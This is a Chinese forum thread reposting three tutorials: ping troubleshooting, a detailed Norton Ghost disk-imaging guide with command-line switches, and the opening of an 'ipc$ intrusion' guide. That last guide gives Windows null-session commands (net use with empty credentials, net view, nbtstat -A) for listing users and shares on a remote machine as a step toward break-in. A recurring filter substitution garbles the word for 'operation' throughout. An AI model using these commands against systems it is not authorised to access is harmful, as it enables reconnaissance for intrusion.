PING命令及使用技巧

Ping命令的使用技巧

Ping是个使用频率极高的实用程序,用于确定本地主机是否能与另一台主机交换(发送与接收)数据报。根据返回的信息,我们就可以推断TCP/IP参数是否设置得正确以及运行是否正常。需要注意的是:成功地与另一台主机进行一次或两次数据报交换并不表示TCP/IP配置就是正确的,我们必须执行大量的本地主机与远程主机的数据报交换,才能确信TCP/IP的正确性。

  简单的说,Ping就是一个测试程序,如果Ping运行正确,我们大体上就可以排除网络访问层、网卡、MODEM的输入输出线路、电缆和路由器等存在的故障,从而减小了问题的范围。但由于可以自定义所发数据报的大小及无休止的高速发送,Ping也被某些别有用心的人作为DDOS(拒绝服务攻击)的工具,例如许多大型的网站就是被黑客利用数百台可以高速接入互联网的电脑连续发送大量Ping数据报而瘫痪的。

  按照缺省设置,Windows上运行的Ping命令发送4个ICMP(网间控制报文协议)回送请求,每个32字节数据,如果一切正常,我们应能得到4 个回送应答。 Ping能够以毫秒为单位显示发送回送请求到返回回送应答之间的时间量。如果应答时间短,表示数据报不必通过太多的路由器或网络连接速度比较快。Ping 还能显示TTL(Time To Live存在时间)值,我们可以通过TTL值推算一下数据包已经通过了多少个路由器:源地点TTL起始值(就是比返回TTL略大的一个2的乘方数)-返回时TTL值。例如,返回TTL值为119,那么可以推算数据报离开源地址的TTL起始值为128,而源地点到目标地点要通过9个路由器网段(128- 119);如果返回TTL值为246,TTL起始值就是256,源地点到目标地点要通过9个路由器网段。

  1、通过Ping检测网络故障的典型次序

  正常情况下,当我们使用Ping命令来查找问题所在或检验网络运行情况时,我们需要使用许多Ping命令,如果所有都运行正确,我们就可以相信基本的连通性和配置参数没有问题;如果某些Ping命令出现运行故障,它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障:

  ·ping 127.0.0.1
  这个Ping命令被送到本地计算机的IP软件,该命令永不退出该计算机。如果没有做到这一点,就表示TCP/IP的安装或运行存在某些最基本的问题。

  ·ping 本机IP
  这个命令被送到我们计算机所配置的IP地址,我们的计算机始终都应该对该Ping命令作出应答,如果没有,则表示本地配置或安装存在问题。出现此问题时,局域网用户请断开网络电缆,然后重新发送该命令。如果网线断开后本命令正确,则表示另一台计算机可能配置了相同的IP地址。

  ·ping 局域网内其他IP
  这个命令应该离开我们的计算机,经过网卡及网络电缆到达其他计算机,再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答,那么表示子网掩码(进行子网分割时,将IP地址的网络部分与主机部分分开的代码)不正确或网卡配置错误或电缆系统有问题。

  ·ping 网关IP
  这个命令如果应答正确,表示局域网中的网关路由器正在运行并能够作出应答。

  ·ping 远程IP
  如果收到4个应答,表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet(但不排除ISP的DNS会有问题)。

  ·ping localhost
  localhost是个作系统的网络保留名,它是127.0.0.1的别名,每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内,则表示主机文件(/Windows/host)中存在问题。

  ·ping www.xxx.com(如www.yesky.com 天极网)
  对这个域名执行Ping www.xxx.com 地址,通常是通过DNS 服务器 如果这里出现故障,则表示DNS服务器的IP地址配置不正确或DNS服务器有故障(对于拨号上网用户,某些ISP已经不需要设置DNS服务器了)。顺便说一句:我们也可以利用该命令实现域名对IP地址的转换功能。

  如果上面所列出的所有Ping命令都能正常运行,那么我们对自己的计算机进行本地和远程通信的功能基本上就可以放心了。但是,这些命令的成功并不表示我们所有的网络配置都没有问题,例如,某些子网掩码错误就可能无法用这些方法检测到。

  2、Ping命令的常用参数选项

  ·ping IP Ct
  连续对IP地址执行Ping命令,直到被用户以Ctrl+C中断。

  ·ping IP -l 3000
  指定Ping命令中的数据长度为3000字节,而不是缺省的32字节。

  ·ping IP Cn
  执行特定次数的Ping命令。
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 36 发表于: 2008-06-14 22:43:07
GHOST详细解说(1)

一、分区备份

  使用ghost进行系统备份,有整个硬盘(Disk)和分区硬盘(Partition)两种方式。在菜单中点击 Local(本地)项,在右面弹出的菜单中有3个子项,其中 Disk表示备份整个硬盘(即克隆)、Partition 表示备份硬盘的单个分区、Check 表示检查硬盘或备份的文件,查看是否可能因分区、硬盘被破坏等造成备份或还原失败。分区备份作为个人用户来保存系统数据,特别是在恢复和复制系统分区时具有实用价值。
  选 Local→Partition→To Image 菜单,弹出硬盘选择窗口,开始分区备份想跳楼作。点击该窗口中白色的硬盘信息条,选择硬盘,进入窗口,选择要想跳楼作的分区(若没有鼠标,可用键盘进行想跳楼作:TAB键进行切换,回车键进行确认,方向键进行选择)。 在弹出的窗口中选择备份储存的目录路径并输入备份文件名称,注意备份文件的名称带有 GHO 的后缀名。 接下来,程序会询问是否压缩备份数据,并给出3个选择:No 表示不压缩,Fast表示压缩比例小而执行备份速度较快,High 就是压缩比例高但执行备份速度相当慢。最后选择 Yes 按钮即开始进行分区硬盘的备份。ghost 备份的速度相当快,不用久等就可以完成,备份的文件以 GHO 后缀名储存在设定的目录中。


二、硬盘克隆与备份

  硬盘的克隆就是对整个硬盘的备份和还原。选择菜单Local→Disk→To Disk,在弹出的窗口中选择源硬盘(第一个硬盘),然后选择要复制到的目标硬盘(第二个硬盘)。注意,可以设置目标硬盘各个分区的大小,ghost 可以自动对目标硬盘按设定的分区数值进行分区和格式化。选择 Yes 开始执行。
  ghost 能将目标硬盘复制得与源硬盘几乎完全一样,并实现分区、格式化、复制系统和文件一步完成。只是要注意目标硬盘不能太小,必须能将源硬盘的数据内容装下。
  ghost 还提供了一项硬盘备份功能,就是将整个硬盘的数据备份成一个文件保存在硬盘上(菜单 Local→Disk→To Image),然后就可以随时还原到其他硬盘或源硬盘上,这对安装多个系统很方便。使用方法与分区备份相似。


三、备份还原

  如果硬盘中备份的分区数据受到损坏,用一般数据修复方法不能修复,以及系统被破坏后不能启动,都可以用备份的数据进行完全的复原而无须重新安装程序或系统。当然,也可以将备份还原到另一个硬盘上。
  要恢复备份的分区,就在界面中选择菜单Local→Partition→From Image,在弹出窗口中选择还原的备份文件,再选择还原的硬盘和分区,点击 Yes 按钮即可。


四、局域网想跳楼作

LPT 是通过并口传送备份文件,下面有两个选项:slave 和 master, 分别用以连接主机和客户机。 网络基本输入输出系统 NetBios 和 LPT 相似, 也有 slave 和 master 两个选项, 作用与 LPT 相同。
先和平时一样将要 ghost 的分区做成一个 *.gho 文件,再在一台 win98 上安装Symantec ghost 企业版,重启。
1. 首先制作一张 ghost 带网卡驱动的启动盘。Start > Programs > Symantec ghost > ghost Boot Wizard->Network Boot Disk 如果你的网卡在列表内直接选择它就可以生成一张带 PC-DOS 的启动盘。(但 6.5版的生成的软盘经常有问题,不能成功启动)如果你的网卡不在列表内,你要建立专用的 Packet Driver。ADD->Packet Driver (网卡的驱动程序中有)往下根据提示一步一步走,填入工作站的 ip(ghost 一定要 tcp/ip 协议)。最后生成一张软盘,但此软盘仍不能使用,要改 autoexec.bat 文件在 net xxxx.dos 后面加一个16进制的地址,如 0X75 等。多台计算机只需改 wattcp.cfg 文件中的 ip 即可:
IP = 192.168.100.44
NETMASK = 255.255.255.0
GATEWAY = 192.168.100.1
2. 在 server 端运行 multicast server 出来的画面。先给 server一个Session Name(别名)如:bb,再选择 image file 就是你的 gho 文件。然后 ->Dump From Client->rtitions->More Options-> 在 auto start 的 client 中填入 50(如果你要同时复制50台)->accept client 就算完成了,当你的工作站数达到50台时,server就自动传送*.gho 文件。

3.详述:
目前,相当多的电子教室都采用了没有软驱、光驱的工作站。在没有软驱、光驱的情况下,当硬盘的软件系统出现问题时,能否实现网络硬盘克隆呢?PXE (Preboot Execution Environment,它是基于 TCP/IP、DHCP、TFTP 等 Internet 协议之上的扩展网络协议)技术提供的从网络启动的功能,让我们找到了解决之道。下面,我们就来讲解怎样采用ghost 7.0来实现基于 PXE 的网络硬盘克隆。

  网络硬盘克隆过程简述

  网络硬盘克隆过程为:在装有软驱的工作站上,用一张引导盘来启动机器,连接到服务器,使用 ghost 多播服务(Multicast Server)将硬盘或分区的映像克隆到工作站,这样就实现了不拆机、安全、快速的网络硬盘克隆。

  实现 PXE 网络启动方式

  对于没有软驱、光驱的工作站,要实现PXE网络启动方式,需要完成三个步骤:

  1、工作站的PXE启动设置

  PXE网络启动一般要求在网卡上加装 PXE 启动芯片(PXE Boot ROM);对于某些型号的网卡,也可以将 PXE 启动代码(Boot Code)写入主板的 Flash ROM;而一些主板上集成了网卡的品牌机(例如清华同方的商用机),可直接支持PXE启动。

  常用的 RTL8139 芯片的网卡,其 PXE 启动设置方式是:机器启动时根据屏幕提示按下Shift+F10,在启动类型中选择PXE,开启网络启动选项即可。
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 37 发表于: 2008-06-14 22:43:25
GHOST详细解说(2)

2、制作 PXE 启动文件

  制作 PXE 的启动文件,推荐使用 3Com 的 DABS(Dynamic Access Boot Services)。DABS 提供了功能强大的 PXE 启动服务、管理功能,但是,网上可供下载的是一个30天的试用版。所以,我们只用它的启动映像文件制作功能,而由 Windows 2000 Server 的 DHCP 服务器来提供 PXE 启动服务。

  DABS 可以安装在任何一台运行 Windows 的机器上。安装后,运行 3Com Boot Image Editor,出现主界面图。选择“创建TCP/IP或PXE映像文件(Create a TCP/IP or PXE image file)”,出现对话窗口。为即将建立的映像文件命名,例如:pxeghost.img,其他采用默认选项,将经测试正常的网络启动盘放入软驱,选择 [OK],创建PXE启动映像 Pxeghost.img文件。

  在 3Com Boot Image Editor 的主菜单中,选择“创建PXE菜单启动文件(Creat a PXE menu boot file)”,在出现的窗口中选择[添加(Add)],加入我们刚刚创建的启动映像文件Pxeghost.img,在“选项(Options)”标签中可以设置菜单标题和等待时间。

  选择[保存(Save)],给保存的PXE菜单启动文件命名为 Pxemenu.pxe。

  3、服务器的PXE启动服务设置

  Windows 2000 Server 的 DHCP 服务支持两种启动协议:DHCP 和 BOOTP。我们可以设定以下三种选择:仅 DHCP、仅 BOOTP、两者。如果我们的局域网中由其他的 DHCP 服务器提供动态 IP 地址分配,那么这里选“仅BOOTP”即可;如果需要这台服务器提供动态 IP 地址分配,则需要选“两者”。

  接下来,设置启动文件名。在DHCP服务器的作用域选项中配置选项“067:启动文件名”,字串值为我们创建的 PXE 菜单启动文件名 Pxemenu.pxe。注意:文件名不包含路径。

  DHCP 服务器只是将启动文件名通知给 BOOTP 客户机,客户机通过什么方式下载启动文件呢?答案是,需要 TFTP 服务。3Com 的 DABS 包含了一个 TFTP 服务组件,当然,也可以下载一个免费的 TFTP 服务器软件长期使用。

  在 TFTP 服务器的设置中,规定一个服务目录。将制作的 PXE 启动文件 Pxeghost.img、Pxemenu.pxe 放到 TFTP 的服务目录中。TFTP 服务器设置为自动运行。

  用 ghost 多播克隆硬盘

  现在运行 ghost 多播服务器,任务名称为 Restore。设置完毕,按下[接受客户(Accept Clients)]按钮。启动要接受硬盘克隆的无软驱工作站,如果以上步骤想跳楼作无误,应该能够实现 PXE 启动,加入到多播克隆的任务当中。所有的目标工作站连接到本次任务之后,按下[发送(Send)]按钮,开始克隆任务。
五、参数设置
在 Options 中可以设置参数。下面简单介绍一下:
1.image write buffering:在建立备份文件时, 打开写缓冲;
2.sure:选择此项后, 不再会出现最终确认询问 (建议不要选择此项);
3.no int 13:选择此项后, 不支持中断 13 (缺省时不选择);
4.reboot:在对硬盘或者分区想跳楼作完成之后, 自动重启计算机;
5.spanning:通过多个卷架构备份文件 (选择此项时, 关闭 write buffering);
6.autoname:自动为 spanning 文件命名;
7.allow 64k fat clusters:允许使用 64K FAT 簇 (仅在 Windows NT 中支持);
8.ignore CRC errors:忽略 CRC 错误;
9.override size limit:如果出现分区大小不相配, 可忽略执行;
10.image read buffering:打开生成备份文件时的读缓存 (缺省时选中此项)。


六、软件特性

1.存贮介质
  ghost 支持的存储介质超出了我们的想象,它支持对等 LPT 接口、对等 U** 接口、对等 TCP/IP 接口、SCSI磁带机、便携式设备(JAZ、ZIP、MO等)、光盘刻录机(CDR、CDRW)等。而这些特性不需要任何外带的驱动程序和软件,只需一张软盘就可以做到!特别是对光盘刻录机的支持,如今的刻录机和空白光盘都十分便宜,非常适合作备份的用途。
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 38 发表于: 2008-06-14 22:43:44
GHOST详细解说(3)

2.兼容性
  ghost 对现有的想跳楼作系统都有良好的支持,包括 FAT16、FAT32、NTFS、HPFS、UNIX、NOVELL 等文件存储格式。同以前版本不同的是,ghost 2001 加入了对 Linux EX2的支持(FIFO 文件存储格式),这也就意味着 Linux 的用户也可以用 ghost 来备份系统了。

3.配套软件

  A.ghost 浏览器
在以前的 ghost版本中,我们只能对整个系统进行简单的备份、复制、还原,要恢复单个的文件和文件夹还要使用外带的 GhostEXP 软件。现在,Symantec 公司已经将 ghost 浏览器整合在软件中。ghost 浏览器采用类似于资源管理器的界面,通过它,我们可以方便迅速地在备份包中找出我们想要的文件和文件夹并还原。
使用Explorer可以备份整个硬盘或单个硬盘分区,点击工具栏上的圆柱形图标,弹出硬盘或分区选择对话窗口,然后再选择备份文件的储存目录并输入名称即可完成。要注意的是,非注册用户不能使用备份这项功能。
在 ghost Explorer 中管理硬盘备份文件就非常方便了。首先选择打开一个备份文件(File/Open),这时备份中的文件就像资源管理器一样在程序界面窗口中列出,可以在其中非常方便地查看、打开文件,也可以查找文件,或者将某个文件删除(但不能删除目录)。
在 ghost Explorer 中提供了多种还原硬盘备份文件的方法,最方便的方法是使用鼠标右键点击某个文件,在弹出菜单中选择 Restore,然后输入要还原到的目录,这样,单个文件就从整个磁盘备份中还原出来了。当然,如果要还原整个磁盘备份,只需选择左面目录列表栏中最上面的带磁盘图标的目录项,然后点击工具栏中的还原图标 (第二个) 就可以了。

B.GDisk
GDisk 是一个新加入的实用工具,它彻底取代了 FDisk 和 format,功能有:
* 快速格式化。
* ######和显示分区。此功能允许一个以上的主 DOS分区,并且每个分区上的想跳楼作系统有不同的版本。######分区的能力使计算机习惯于引导到选定的可引导分区,忽略其他######分区中相同想跳楼作系统的安装。
* 全面的分区报告。
* 高度安全的磁盘擦除。提供符合美国国防部标准和更高安全标准的磁盘擦除选项。
与使用交互式菜单的 FDisk 不同,GDisk是由命令行驱动的。这提供了更快的配置磁盘分区和在批处理文件中定义 GDisk想跳楼作的能力。但与此同时,几十个参数会令普通用户头疼,因此笔者不推荐一般用户使用,Symantec 公司也应该推出相应的GUI(图形用户界面)控制台以方便用户使用。具体的参数说明可以用命令行 gdisk/? 了解。

C.Live Update
Live Update 是 Symantec公司软件的一个通用升级程序,它能够检查当前系统中已安装的 Symantec 软件,并且通过英特网对软件进行在线升级。
在安装 ghost 2001 时,安装程序自动升级了 Live Update 程序的版本。


七、命令行参数:(ghost 的无人 备份/恢复/复制 想跳楼作)

  其实 ghost 2001 的功能远远不止它主程序中显示的那些,ghost 可以在其启动的命令行中添加众多参数以实现更多的功能。命令行参数在使用时颇为复杂,不过我们可以制作批处理文件,从而“一劳永逸”(类似于无人安装 Windows 98 和Windows 2000)。现在让我们来了解一些常用的参数(了解更加详细的参数介绍可查看 ghost 的帮助文件)。
1.-rb
本次 ghost 想跳楼作结束退出时自动重启。这样,在复制系统时就可以放心离开了。
2.-fx
本次 ghost 想跳楼作结束退出时自动回到DOS提示符。
3.-sure
对所有要求确认的提示或警告一律回答“Yes”。此参数有一定危险性,只建议高级用户使用。
4.-fro
如果源分区发现坏簇,则略过提示而强制拷贝。此参数可用于试着挽救硬盘坏道中的数据。
5.@filename
在 filename 中指定 txt 文件。txt文件中为 ghost 的附加参数,这样做可以不受DOS命令行 150 个字符的限制。
6.-f32
将源 FAT16 分区拷贝后转换成 FAT32(前提是目标分区不小于 2G)。WinNT 4 和Windows95、97用户慎用。
7.-bootcd
当直接向光盘中备份文件时,此选项可以使光盘变成可引导。此过程需要放入启动盘。
8.-fatlimit
将 NT 的 FAT16 分区限制在 2G。此参数在复制 Windows NT 分区,且不想使用64k/簇的 FAT16 时非常有用。
9.-span
分卷参数。当空间不足时提示复制到另一个分区的另一个备份包。
10.-auto
分卷拷贝时不提示就自动赋予一个文件名继续执行。
11.-crcignore
忽略备份包中的 CRC ERROR。除非需要抢救备份包中的数据,否则不要使用此参数,以防数据错误。
12.-ia
全部映像。ghost 会对硬盘上所有的分区逐个进行备份。
13.-ial
全部映像,类似于 -ia 参数,对 Linux 分区逐个进行备份。
14.-id
全部映像。类似于 -ia 参数,但包含分区的引导信息。
15.-quiet
想跳楼作过程中禁止状态更新和用户干预。
16.-script
可以执行多个 ghost 命令行。命令行存放在指定的文件中。
17.-split=x
  将备份包划分成多个分卷,每个分卷的大小为 x兆。这个功能非常实用,用于大型备份包复制到移动式存储设备上,例如将一个 1.9G 的备份包复制到 3 张刻录盘上。
18.-z
  将磁盘或分区上的内容保存到映像文件时进行压缩。-z 或 -z1 为低压缩率(快速);-z2 为高压缩率(中速);-z3 至 -z9 压缩率依次增大(速度依次减慢)。
19.-clone
  这是实现 ghost 无人备份/恢复的核心参数。使用语法为:
-clone,MODE=(operation),SRC=(source),DST=(destination),[SZE(size),SZE(size)...]
此参数行较为复杂,且各参数之间不能含有空格。其中 operation意为想跳楼作类型,值可取:copy:磁盘到磁盘;load:文件到磁盘;dump:磁盘到文件;pcopy:分区到分区;pload:文件到分区;pdump:分区到文件。
  Source 意为想跳楼作源,值可取:驱动器号,从1开始;或者为文件名,需要写绝对路径。
Destination 意为目标位置,值可取:驱动器号,从 1开始;或者为文件名,需要写绝对路径;@CDx,刻录机,x 表示刻录机的驱动器号,从1开始。

下面举例说明:

1.命令行参数:ghostpe.exe -clone,mode=copy,src=1,dst=2
完成想跳楼作:将本地磁盘1复制到本地磁盘2。

2.命令行参数:ghostpe.exe -clone,mode=pcopy,src=1:2,dst=2:1
完成想跳楼作:将本地磁盘1上的第二分区复制到本地磁盘2的第一分区。

3.命令行参数:ghostpe.exe-clone,mode=load,src=g:\3prtdisk.gho,dst=1,sze1=450M,sze2=1599M,sze3=2047M
完成想跳楼作:从映像文件装载磁盘1,并将第一个分区的大小调整为450MB,第二个调整为1599MB,第三个调整为2047MB。

4.命令行参数:ghostpe.exe -clone,mode=pdump,src2:1:4:6,dst=d:\prt246.gho
完成想跳楼作:创建仅含有选定分区的映像文件。从磁盘2上选择分区1、4、6。

八、一些示例
ghost.exe -clone,mode=copy,src=1,dst=2 -sure
硬盘对拷

ghost.exe -clone,mode=pcopy,src=1:2,dst=2:1 -sure
将一号硬盘的第二个分区复制到二号硬盘的第一个分区

ghost.exe -clone,mode=pdump,src=1:2,dst=g:\bac.gho
将一号硬盘的第二个分区做成映像文件放到 g 分区中

ghost.exe -clone,mode=pload,src=g:\bac.gho:2,dst=1:2
从内部存有两个分区的映像文件中,把第二个分区还原到硬盘的第二个分区

ghost.exe -clone,mode=pload,src=g:\bac.gho,dst=1:1 -fx -sure -rb
用 g 盘的 bac.gho 文件还原 c 盘。完成后不显示任何信息,直接启动

ghost.exe -clone,mode=load,src=g:\bac.gho,dst=2,SZE1=60P,SZE2=40P
将映像文件还原到第二个硬盘,并将分区大小比例修改成 60:40

自动还原磁盘:
首先做一个启动盘,包含 Config.sys, Autoexec.bat, Command.com, Io.sys, ghost.exe 文件(可以用 windows 做启动盘的程序完成)。Autoexec.bat 包含以下命令:
ghost.exe -clone,mode=pload,src=d:\bac.gho,dst=1:1 -fx -sure -rb
利用在 D 盘的文件自动还原,结束以后自动退出 ghost 并且重新启动。

自动备份磁盘:
ghost.exe -clone,mode=pdump,src=1:1,dst=d:\bac.gho -fx -sure -rb

自动还原光盘:
包含文件:Config.sys, Autoexec.bat, Mscdex.exe (CDROM 执行程序), Oakcdrom.sys (ATAPI CDROM 兼容驱动程序), ghost.exe。
Config.sys 内容为:
DEVICE=OAKCDROM.SYS /D:IDECD001
Autoexec.bat 内容为:
MSCDEX.EXE /D:IDECE001 /L:Z
ghost -clone,mode=load,src=z:\bac.gho,dst=1:1 -sure -rb

可以根据下面的具体说明修改示例:

1.-clone

-clone 在使用时必须加入参数,它同时也是所有的 switch{batch switch} 里最实用的。下面是 clone 所定义的参数:

mode={copy|load|dump|pcopy|pload|pdump},
src={drive|file|driveartition},
dst={drive|file|driveartition}

mode 指定要使用哪种 clone 所提供的命令
copy 硬盘到硬盘的复制 (disk to disk copy)
load 文件还原到硬盘 (file to disk load)
dump 将硬盘做成映像文件 (disk to file dump)
pcopy 分区到分区的复制 (partition to partition copy)
pload 文件还原到分区 (file to partition load)
pdump 分区备份成映像文件(partition to file dump)

src 指定了 ghost 运行时使用的源分区的位置模式及其意义。对应 mode 命令 src 所使用参数例子:
COPY/DUMP 源硬盘号。以 1 代表第一号硬盘
LOAD 映像文件名。g:/back98/setup98.gho 或装置名称 (drive)
PCOPY/PDUMP 源分区号。1:2 代表的是硬盘1的第二个分区
PLOAD 分区映像文件名加上分区号或是驱动器名加上分区号。g:\back98.gho:2 代表映像文件里的第二个分区

dst 指定运行 ghost 时使用的目标位置模式及其意义。对应 mode 命令 dst 所使用参数例子:
COPY/DUMP 目的硬盘号。2 代表第二号硬盘
LOAD 硬盘映像文件名。例 g:\back98\setup98.gho
PCOPY/PLOAD 目的分区号。2:2 代表硬盘 2 的第二个分区
PDUMP 分区映像文件名加分区号。g:\back98\setup98.gho:2
SZEn 指定所使用目的分区的大小:
n=xxxxM 指定第 n 目的分区的大小为 xxxxMB。如 SZE2=800M 表示分区 2 的大小为 800MB
n=mmP 指定第 n 目的分区的大小为整个硬盘的 mm 个百分比。

2.-fxo 当源物件出现坏块时,强迫复制继续进行

3.-fx 当ghost完成新系统的工作后不显示 press ctrl-alt-del to reboot 直接回到DOS下

4.-ia 完全执行扇区到扇区的复制。当由一个映像文件或由另一个硬盘为来源,复制一个分区时,ghost将首先检查来源分区,再决定是要复制文件和目录结构还是要做映像复制(扇区到扇区)。预设是这种形式。但是有的时候,硬盘里特定的位置可能会放一些######的与系统安全有关的文件。只有用扇区到扇区复制的方法才能正确复制

5.-pwd and -pwd=x 给映像文件加密

6.-rb 在还原或复制完成以后,让系统重新启动

7.-sure 可以和 clone 合用。ghost 不会显示 proceed with disk clone-destination drive will be overwritten? 提示信息

九、注意事项

1.在备份系统时,单个的备份文件最好不要超过 2GB。
2.在备份系统前,最好将一些无用的文件删除以减少ghost文件的体积。通常无用的文件有:Windows 的临时文件夹、IE 临时文件夹、Windows 的内存交换文件。这些文件通常要占去100 多兆硬盘空间。
3.在备份系统前,整理目标盘和源盘,以加快备份速度。
4.在备份系统前及恢复系统前,最好检查一下目标盘和源盘,纠正磁盘错误。
5.在恢复系统时,最好先检查一下要恢复的目标盘是否有重要的文件还未转移,千万不要等硬盘信息被覆盖后才后悔莫及啊。
6.在选择压缩率时,建议不要选择最高压缩率,因为最高压缩率非常耗时,而压缩率又没有明显的提高。
7.在新安装了软件和硬件后,最好重新制作映像文件,否则很可能在恢复后出现一些莫名其妙的错误。
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 39 发表于: 2008-06-14 22:44:05
ipc$详细解说大全(1)

一 前言
二 什么是ipc$
三 什么是空会话
四 空会话可以做什么
五 ipc$连接所使用的端口
六 ipc$连接在hack攻击中的意义
七 ipc$连接失败的常见原因
八 复制文件失败的原因
九 如何打开目标的IPC$共享以及其他共享
十 一些需要shell才能完成的命令
十一 入侵中可能会用到的相关命令
十二 ipc$完整入侵步骤祥解
十三 如何防范ipc$入侵
十四 ipc$入侵问答精选
十五 结束的话

一 前言

网上关于ipc$入侵的文章可谓多如牛*,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的种种迷惑(你随便找一个 hack论坛搜一下ipc$,看看存在的疑惑有多少)。因此我参考了网上的一些资料,教程以及论坛帖子,写了这篇总结性质的文章,想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!
注意:本文所讨论的各种情况均默认发生在win NT/2000环境下,win98将不在此次讨论之列,而鉴于win Xp在安全设置上有所提高,个别想跳楼作并不适用,有机会将单独讨论。


二 什么是ipc$


IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$……)和系统目录 winnt或windows(admin$)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。
平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:空会话(Null session)。那么什么是空会话呢?




三 什么是空会话


在介绍空会话之前,我们有必要了解一下一个安全会话是如何建立的。
在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的,建立成功的会话将成为一个安全隧道,建立双方通过它互通信息,这个过程的大致顺序如下:
1)会话请求者(客户)向会话接收者(服务器)传送一个数据包,请求安全隧道的建
立;
2)服务器产生一个随机的64位数(实现挑战)传送回客户;
3)客户取得这个由服务器产生的64位数,用试图建立会话的帐号的口令打乱它,将结
果返回到服务器(实现响应);
4)服务器接受响应后发送给本地安全验证(LSA),LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号,核实本地发生;如果请求的帐号是一个域的帐号,响应传送到域控制器去核实。当对挑战的响应核实为正确后,一个访问令牌产生,然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程,那么空会话又如何呢?

空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密码),但根据WIN2000的访问控制模型,空会话的建立同样需要提供一个令牌,可是空会话在建立过程中并没有经过用户信息的认证,所以这个令牌中不包含用户信息,因此,这个会话不能让系统间发送加密信息,但这并不表示空会话的令牌中不包含安全标识符SID(它标识了用户和所属组),对于一个空会话,LSA提供的令牌的SID是S-1-5-7,这就是空会话的SID,用户名是: ANONYMOUS LOGON(这个用户名是可以在用户列表中看到的,但是是不能在SAM数据库中找到,属于系统内置的帐号),这个访问令牌包含下面伪装的组:
Everyone
Network
在安全策略的限制下,这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢?


四 空会话可以做什么


对于NT,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,访问everyone权限的共享,访问小部分注册表等,并没有什么太大的利用价值;对2000作用更小,因为在Windows 2000 和以后版本中默认只有管理员和备份想跳楼作员有权从网络访问到注册表,而且实现起来也不方便,需借助工具。从这些我们可以看到,这种非信任会话并没有多大的用处,但从一次完整的ipc$入侵来看,空会话是一个不可缺少的跳板,因为我们从它那里可以得到户列表,这对于一个老练的黑客已经足够了。以下是空会话中能够使用的具体命令:


1 首先,我们先建立一个空会话(需要目标开放ipc$)
命令:net use \\ip\ipc$ "" /user:""
注意:上面的命令包括四个空格,net与use中间有一个空格,use后面一个,密码左右各一个空格。


2 查看远程主机的共享资源
命令:net view \\IP
解释:建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下类似类似结果:
在 \\*.*.*.*的共享资源
资源共享名 类型 用途 注释
pc$详细解说大全(2)

NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。


3 查看远程主机的当前时间
命令:net time \\IP
解释:用此命令可以得到一个远程主机的当前时间。


4 得到远程主机的NetBIOS用户名列表(需要打开自己的NBT)
nbtstat -A IP
用此命令可以得到一个远程主机的NetBIOS用户名列表(需要你的netbios支持),返回如下结果:

Node IpAddress: [*.*.*.*] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__M**ROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER......<00> UNIQUE Registered

MAC Address = 00-50-8B-9A-2D-37

以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要注意一点:建立IPC$连接的想跳楼作会在EventLog中留下记录,不管你是否登录成功。 好了,那么下面我们就来看看ipc$所使用的端口是什么?







五 ipc$所使用的端口


首先我们来了解一些基础知识:
1 SMBServer Message Block) Windows协议族,用于文件打印共享的服务;
2 NBTNETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS网络互联。
3 在WindowsNT中SMB基于NBT实现,而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现。

有了这些基础知识,我们就可以进一步来讨论访问网络共享对端口的选择了:

对于win2000客户端来说:
1 如果在允许NBT的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口无响应时,才使用139端口,如果两个端口都没有响应,则会话失败;
2 如果在禁止NBT的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端口无响应,那么会话失败。由此可见,禁止了NBT后的win 2000对win NT的共享访问将会失败。


对于win2000服务器端来说:
1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放;
2 如果禁止NBT,那么只有445端口开放。


